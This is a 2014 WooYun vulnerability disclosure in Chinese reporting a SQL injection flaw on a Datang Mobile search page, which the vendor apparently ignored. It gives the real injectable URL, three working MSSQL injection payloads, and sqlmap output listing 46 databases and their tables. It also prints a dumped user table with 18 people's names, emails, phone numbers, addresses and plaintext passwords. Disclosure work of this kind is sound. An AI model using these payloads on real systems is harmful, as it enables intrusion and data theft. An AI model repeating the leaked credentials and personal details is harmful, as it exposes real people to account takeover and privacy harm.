当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074221

漏洞标题:大唐移动sql注入漏洞

相关厂商:大唐移动

漏洞作者: cf_hb

提交时间:2014-08-28 18:21

修复时间:2014-10-12 18:22

公开时间:2014-10-12 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

存在严重SQL注入漏洞,发现46个库可被利用脱裤造成大量用户敏感信息泄露

详细说明:

保持好习惯先确认身份:
URL:http://www.datangmobile.cn/
截图:

index.jpg


注入点:http://219.142.67.31/Search.aspx?KeyWords=12
参数: KeyWords没有过滤或者过滤布严
当前用户:
Place: GET
Parameter: KeyWords
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KeyWords=12%' AND 7149=7149 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: KeyWords=12%' AND 2363=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(122)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (2363=2363) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(108)+CHAR(121)+CHAR(113))) AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: KeyWords=12%' AND 7894=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[14:49:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[14:49:52] [INFO] fetching current database
[14:49:52] [INFO] retrieved: DTN
current database: 'DTN'
[14:49:52] [INFO] fetching database users
[14:49:53] [INFO] the SQL query used returns 2 entries
[14:49:53] [INFO] retrieved: dbuser
[14:49:54] [INFO] retrieved: sa
database management system users [2]:
[*] dbuser
[*] sa
SQLMPA列出数据库:
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[14:42:19] [INFO] fetching database names
[14:42:20] [INFO] the SQL query used returns 46 entries
[14:42:20] [INFO] retrieved: book
[14:42:21] [INFO] retrieved: book_sh
[14:42:21] [INFO] retrieved: CommunityServer
[14:42:21] [INFO] retrieved: Contract
[14:42:22] [INFO] retrieved: ContractNew
[14:42:22] [INFO] retrieved: CSCarReservation
[14:42:25] [INFO] retrieved: db_contract_crm
[14:42:29] [INFO] retrieved: DB_FW
[14:42:33] [INFO] retrieved: db_srm
[14:42:34] [INFO] retrieved: DB_ZHGL
[14:42:34] [INFO] retrieved: dcwq
[14:42:35] [INFO] retrieved: distribution
[14:42:35] [INFO] retrieved: DT_HRInfoPublish
[14:42:36] [INFO] retrieved: DT_Inforeg
[14:42:36] [INFO] retrieved: Dt_library
[14:42:37] [INFO] retrieved: DT_RDInformation
[14:42:37] [INFO] retrieved: DT_TaskSupervision
[14:42:38] [INFO] retrieved: DT_zhaopin
[14:42:38] [INFO] retrieved: DTBBS
[14:42:39] [INFO] retrieved: DTMobile_EAI
[14:42:39] [INFO] retrieved: DTMobile_QM
[14:42:40] [INFO] retrieved: DTN
[14:42:40] [INFO] retrieved: DTS
[14:42:40] [INFO] retrieved: employee
[14:42:41] [INFO] retrieved: feedback
[14:42:41] [INFO] retrieved: Feedback_sh
[14:42:42] [INFO] retrieved: feedbackNew
[14:42:42] [INFO] retrieved: feedbacktest
[14:42:43] [INFO] retrieved: HelpDesk2
[14:42:43] [INFO] retrieved: HelpDesk3
[14:42:44] [INFO] retrieved: Intranet
[14:42:44] [INFO] retrieved: jecn
[14:42:45] [INFO] retrieved: jecnOld
[14:42:45] [INFO] retrieved: master
[14:42:45] [INFO] retrieved: medicine
[14:42:46] [INFO] retrieved: model
[14:42:46] [INFO] retrieved: msdb
[14:42:49] [INFO] retrieved: NSurvey
[14:42:49] [INFO] retrieved: PDM
[14:42:50] [INFO] retrieved: Reservation
[14:42:50] [INFO] retrieved: RoomReservationV2
[14:42:51] [INFO] retrieved: Task
[14:42:51] [INFO] retrieved: tempdb
[14:42:55] [INFO] retrieved: YQYBRoomReservation
[14:42:55] [INFO] retrieved: ZDTDX
[14:42:56] [INFO] retrieved: zdtlwd
available databases [46]:
[*] book
[*] book_sh
[*] CommunityServer
[*] Contract
[*] ContractNew
[*] CSCarReservation
[*] db_contract_crm
[*] DB_FW
[*] db_srm
[*] DB_ZHGL
[*] dcwq
[*] distribution
[*] DT_HRInfoPublish
[*] DT_Inforeg
[*] Dt_library
[*] DT_RDInformation
[*] DT_TaskSupervision
[*] DT_zhaopin
[*] DTBBS
[*] DTMobile_EAI
[*] DTMobile_QM
[*] DTN
[*] DTS
[*] employee
[*] feedback
[*] Feedback_sh
[*] feedbackNew
[*] feedbacktest
[*] HelpDesk2
[*] HelpDesk3
[*] Intranet
[*] jecn
[*] jecnOld
[*] master
[*] medicine
[*] model
[*] msdb
[*] NSurvey
[*] PDM
[*] Reservation
[*] RoomReservationV2
[*] Task
[*] tempdb
[*] YQYBRoomReservation
[*] ZDTDX
[*] zdtlwd
翻翻当前数据库:
Database: DTN
[30 tables]
+----------------------+
| DTKY_Article |
| DTKY_Category |
| DTKY_Column |
| DTKY_Per_Picture |
| DTKY_Periodical |
| DTN_BaseDict |
| DTN_Category |
| DTN_Count |
| DTN_NEWNews |
| DTN_News |
| DTN_NewsAttach |
| DTN_NewsCategory |
| DTN_NewsLog |
| DTN_Remark |
| DTN_Role |
| DTN_ShareUser |
| DTN_Topic |
| DTN_User |
| DTS_V_AdminDeptPower |
| DTS_V_DownLoadNote |
| DTW_Cases |
| DTW_Category |
| DTW_Content |
| DTW_Link |
| DTW_LinkNew |
| DTW_Product |
| DTW_Project |
| DTW_Service |
| dtproperties |
| pangolin_test_table |
+----------------------+
字段:
Database: DTN
Table: DTN_User
[7 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| Department | nvarchar |
| DisplayName | nvarchar |
| EMail | nvarchar |
| LastLogin | datetime |
| LocalID | nvarchar |
| SAMAccount | nvarchar |
| UserID | int |
+-------------+----------+
看看别的库:
Database: DTS
[29 tables]
+--------------------------+
| DTS_Admin |
| DTS_AdminDeptPower |
| DTS_AdminPower |
| DTS_Article |
| DTS_ArticleAttach |
| DTS_BBS_Blacklist |
| DTS_BBS_Forum |
| DTS_BBS_ForumAdmin |
| DTS_BBS_ForumAttach |
| DTS_BBS_ForumPost |
| DTS_BBS_ForumTopic |
| DTS_BBS_VoteItem |
| DTS_BBS_VoteLog |
| DTS_Category |
| DTS_ClearData |
| DTS_Data |
| DTS_DataAttach |
| DTS_Dict |
| DTS_DownLoadNote |
| DTS_Product |
| DTS_ProductSeries |
| DTS_ProductSuggest |
| DTS_ProductSuggestAttach |
| DTS_Survey |
| DTS_User |
| DTS_V_AdminDeptPower |
| DTS_V_DownLoadNote |
| DTS_VisitStatistic |
| dtproperties |
+--------------------------+
46个库慢慢翻肯定可以发现很多用户敏感数据的,脱裤什么的估计也的花个一天或大半天吧!!
看看部分表里的数据:
Database: DTS
Table: DTS_User
[18 entries]
+------+--------------+-------------+---------+---------+-------------+----------+----------+--------------+-----------------------------+----------+-------------------+------------------------+------------+-------------+--------------+
| ID | UserID | DeptPowerID | UserSex | PostNum | UserPWD | UserName | UserType | UserNick | UserMail | UserNote | UserPhone | CreateDate | ActiveFlag | UserAddress | UserCompany |
+------+--------------+-------------+---------+---------+-------------+----------+----------+--------------+-----------------------------+----------+-------------------+------------------------+------------+-------------+--------------+
| 10 | yyh | 1 | 0 | 14 | 987456 | yeyuhui | 0 | yyh | yeyuhui@datangmobile.cn | <blank> | 010-58832000-2160 | 07 26 2006 \\?a04:26PM | 1 | <blank> | DTM |
| 100 | abmvp2000 | 1 | 0 | 0 | 199812 | wenwu | 0 | anan | i-anbin@datangmobile.cn | <blank> | <blank> | 11 27 2006 \\?a01:22PM | 1 | <blank> | <blank> |
| 1000 | sdyd7chu | 1 | 0 | 0 | 85872277 | 肖太迎 | 2 | xiao | 5872277@vip.163.com | <blank> | 0531-85872277 | 03 18 2008 \\?a02:16PM | 1 | 山东济南济洛路93号 | 山东省邮电工程有限公司 |
| 1001 | szyszy | 1 | 0 | 0 | 99388239 | szy | 0 | szy | andydex-163@163.com | <blank> | <blank> | 03 18 2008 \\?a04:27PM | 1 | <blank> | dtyd |
| 1002 | t8881246105 | 1 | 0 | 0 | 198317 | 谭超 | 0 | 你是我的唯一 | 8881246105@163.com | <blank> | <blank> | 03 19 2008 \\?a07:36AM | 1 | <blank> | 重庆腾俊 |
| 1003 | ruojiruoli | 1 | 0 | 0 | 19831210 | 李盘根 | 2 | juwuyan | juwuyan@sina.com.cn | <blank> | <blank> | 03 19 2008 \\?a03:22PM | 1 | <blank> | 江西邮电建设工程有限公司 |
| 1004 | huide_zhu | 1 | 0 | 0 | 720420 | 朱汇德 | 0 | 阿德 | zhuhuide@datang.com | <blank> | <blank> | 03 20 2008 11:52AM | 1 | <blank> | 深圳市大唐电信有限公司 |
| 1005 | zhoubin8013 | 1 | 0 | 0 | 8389728 | 周斌 | 0 | 周斌 | lubin8013@yahoo.com.cn | <blank> | <blank> | 03 20 2008 \\?a02:23PM | 1 | <blank> | 安徽中辉 |
| 1006 | lubin8013 | 1 | 0 | 1 | 13865981290 | 文飞凤武 | 0 | 文飞凤武 | lubin8013@163.com | <blank> | <blank> | 03 20 2008 \\?a02:25PM | 1 | <blank> | 安徽中辉通信技术有限公司 |
| 1007 | wangxiaohang | 1 | 0 | 0 | 19781024 | 王小航 | 0 | wangxiaohang | wangxiaohang@datang.com | <blank> | <blank> | 03 20 2008 \\?a02:30PM | 1 | <blank> | 深圳市大唐电信有限公司 |
| 1008 | wxl1919 | 1 | 0 | 0 | wangxing | 王醒龙 | 0 | wxl | wangxinglong@datang.com | <blank> | <blank> | 03 20 2008 \\?a03:47PM | 1 | <blank> | 深圳大唐 |
| 1009 | blueweedfly | 1 | 0 | 0 | 489124weed | 宗春 | 2 | weed | zcyd@jsptpd.com | <blank> | <blank> | 03 20 2008 \\?a04:02PM | 1 | <blank> | 江苏设计院 |
| 101 | ruanleifeng | 1 | 0 | 0 | 094799 | 阮磊峰 | 3 | 风雨无阻 | ruanleifeng@datangmobile.cn | <blank> | 2602 | 11 27 2006 \\?a06:45PM | 1 | <blank> | <blank> |
| 1010 | gaoxiaogang | 1 | 0 | 0 | gxg810206 | 高小刚 | 2 | 通信郎 | gaoxiaogang@datang.com | <blank> | <blank> | 03 20 2008 \\?a05:00PM | 1 | <blank> | 深圳大唐电信有限公司 |
| 1011 | jinxin | 1 | 0 | 73 | 123 | 金鑫 | 3 | 金鑫 | jinxin@datangmobile.cn | <blank> | 13520112306 | 03 20 2008 \\?a07:05PM | 1 | 新楼209 | DTmobile |
| 1012 | xuguikun | 1 | 1 | 6 | Vx.works | xuguikun | 0 | xuxu | xuguikun@datangmobile.cn | <blank> | <blank> | 03 20 2008 \\?a09:05PM | 1 | <blank> | 北京 |
| 1013 | liuejun | 1 | 0 | 0 | 112930 | 柳科军 | 0 | tadpole | liukejun@datangmobile.cn | <blank> | <blank> | 03 20 2008 10:21PM | 1 | <blank> | 大唐移动 |
| 1014 | zlsuperman | 1 | 0 | 2 | 1q2w3e4r5t | 邹林 | 2 | 跳蚤 | zoulin@datang.com | <blank> | <blank> | 03 20 2008 11:10PM | 1 | <blank> | 深圳市大唐电信有限公司 |
+------+--------------+-------------+---------+---------+-------------+----------+----------+--------------+-----------------------------+----------+-------------------+------------------------+------------+-------------+--------------+
其他的表啊库啊就不翻了,旨在证明漏洞的严峻性,望赶紧修复!!

漏洞证明:

请见上面!

修复方案:

严格过滤用户提交的参数

版权声明:转载请注明来源 cf_hb@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝